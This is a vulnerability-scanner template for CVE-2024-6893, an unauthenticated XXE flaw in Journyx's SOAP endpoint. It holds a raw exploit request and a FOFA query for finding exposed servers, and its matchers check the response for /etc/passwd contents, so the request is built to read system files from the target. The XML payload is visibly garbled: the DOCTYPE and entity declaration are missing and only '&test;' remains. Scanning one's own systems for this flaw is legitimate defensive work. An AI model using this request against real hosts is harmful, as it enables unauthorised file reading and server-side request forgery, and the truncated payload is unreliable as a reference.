id: CVE-2024-6893 info: name: Journyx - XML External Entities Injection (XXE) author: s4eio severity: high description: | The "soap_cgi.pyc" API handler allows the XML body of SOAP requests to contain references to external entities. This allows an unauthenticated attacker to read local files, perform server-side request forgery, and overwhelm the web server resources. reference: - https://securityforeveryone.com/tools/journyx-xxe-cve-2024-6893 - https://korelogic.com/Resources/Advisories/KL-001-2024-010.txt - https://packetstormsecurity.com/files/180005/Journyx-11.5.4-XML-Injection.html - https://nvd.nist.gov/vuln/detail/CVE-2024-6893 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-6893 cwe-id: CWE-611 metadata: max-request: 1 vendor: journyx product: journyx-jtime fofa-query: icon_hash="-109972155" tags: cve,cve2024,journyx,xxe variables: pass: "{{rand_text_alpha(5)}}" http: - raw: - | POST /jtcgi/soap_cgi.pyc HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded ]>&test;{{pass}}{{pass}} matchers-condition: and matchers: - type: regex part: body regex: - 'root:.*:0:0:' - 'invalid password for user' condition: and - type: word part: header words: - 'text/xml' - type: status status: - 200 # digest: 4a0a00473045022100ccfcc5493ee053e591017307e4fd5f8a6c02f7a2453eff36d699da148931a65702206bfcce7c41d4b2ce64ea1c795f61e368009d03fb9daf31dbe6a9fcbb8518444c:922c64590222798bb761d5b6d8e72950